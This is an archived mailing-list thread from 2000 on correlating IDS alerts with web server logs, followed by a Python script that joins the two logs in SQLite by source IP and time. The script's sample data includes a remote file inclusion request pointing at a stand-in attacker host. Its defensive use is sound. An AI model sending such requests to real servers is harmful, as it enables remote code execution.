
RE: Tools to correlate attacks b/w diff. logs


Subject: RE: Tools to correlate attacks b/w diff. logs
From: Desai, Ashish (Ashish.Desai@fmr.com)
Date: Thu Jan 13 2000 - 10:06:57 CST


You can parse the logs in Perl and then populate either MS Access or a SQL-like database (MySQL, Sybase, ...) and run SQL queries.
Surprisingly, you can go quite a long way with Access; it supports a database size of 2 GB.
Using VB in Access you can automate a lot in terms of populating the database and running the queries.

Ashish Desai
Fidelity Investments
> -----Original Message-----
> From: Pete Storm [SMTP:petestorm@yahoo.com]
> Sent: Tuesday, January 11, 2000 3:18 PM
> To: firewall-wizards@nfr.net
> Subject: Tools to correlate attacks b/w diff. logs
>
> Hi all,
>
> Does anyone know of a tool out there that will allow
> me to correlate incidents between several different
> logs? For example, if I see an attempt to pull off a
> php exploit on my IDS it stands to reason that I'll
> see a similar log entry on my web server. What I'm
> looking for is something that will pull these two
> records out of the individual logs and place them in
> an "incident" log as a related event.
>
> The current problem is that we're talking about
> hundreds of thousands of log entries. Suppose I could
> Perl it, but I was kinda hoping there might be a
> commercial/shareware tool out there already that could
> do it so much better than I could.
>
> thanks,
> phs
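The parse-then-query approach from the reply above, as an added example that is not part of the thread: it uses Python and an in-memory SQLite database in place of Perl and Access, loads constructed IDS alert and web server access log lines (the line formats and the field regexes are assumptions, not a real product's format), and joins the two tables on source IP within a time window to produce the "incident" records the original poster asked for. Both logs are assumed to carry timestamps in the same local time.

```python
import re
import sqlite3
from datetime import datetime

# Constructed sample data (not from the thread). The IDS line format is invented;
# the web lines follow Apache common log layout. Both are in the same local time.
IDS_LINES = [
    "2000-01-11 15:02:10 alert src=10.0.0.5 dst=192.168.1.10 msg=WEB-PHP remote file include attempt",
    "2000-01-11 15:30:00 alert src=10.0.0.9 dst=192.168.1.10 msg=ICMP sweep",
]
WEB_LINES = [
    '10.0.0.5 - - [11/Jan/2000:15:02:12 -0600] "GET /index.php?page=http://attacker.example/x HTTP/1.0" 200 512',
    '10.0.0.7 - - [11/Jan/2000:15:05:00 -0600] "GET /about.html HTTP/1.0" 200 1024',
]

IDS_RE = re.compile(r"^(\S+ \S+) alert src=(\S+) dst=(\S+) msg=(.*)$")
WEB_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+)$')

def parse_ids(line):
    """Return (timestamp, src, dst, msg) for one IDS alert line."""
    m = IDS_RE.match(line)
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return (ts.isoformat(sep=" "), m.group(2), m.group(3), m.group(4))

def parse_web(line):
    """Return (timestamp, src, request, status) for one access log line; the zone offset is dropped."""
    m = WEB_RE.match(line)
    ts = datetime.strptime(m.group(2).split()[0], "%d/%b/%Y:%H:%M:%S")
    return (ts.isoformat(sep=" "), m.group(1), m.group(3), int(m.group(4)))

def correlate(ids_lines, web_lines, window_sec=60):
    """Load both logs into SQLite and join IDS alerts to web hits from the same source IP within window_sec."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ids(ts TEXT, src TEXT, dst TEXT, msg TEXT)")
    db.execute("CREATE TABLE web(ts TEXT, src TEXT, request TEXT, status INTEGER)")
    db.executemany("INSERT INTO ids VALUES (?,?,?,?)", map(parse_ids, ids_lines))
    db.executemany("INSERT INTO web VALUES (?,?,?,?)", map(parse_web, web_lines))
    # An index on (src, ts) is what keeps the join usable at hundreds of thousands of rows.
    db.execute("CREATE INDEX web_src_ts ON web(src, ts)")
    rows = db.execute(
        """SELECT i.ts, i.src, i.msg, w.ts, w.request, w.status
           FROM ids i JOIN web w ON w.src = i.src
           WHERE abs(strftime('%s', w.ts) - strftime('%s', i.ts)) <= ?
           ORDER BY i.ts""", (window_sec,)).fetchall()
    db.close()
    return rows

if __name__ == "__main__":
    for incident in correlate(IDS_LINES, WEB_LINES):
        print("INCIDENT", incident)
```

Alerts with no matching web hit (the ICMP sweep) and web hits with no alert (10.0.0.7) are left out, so the result is only the cross-log incidents.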



This archive was generated by hypermail 2b27 : Sat Jan 15 2000 - 21:37:24 CST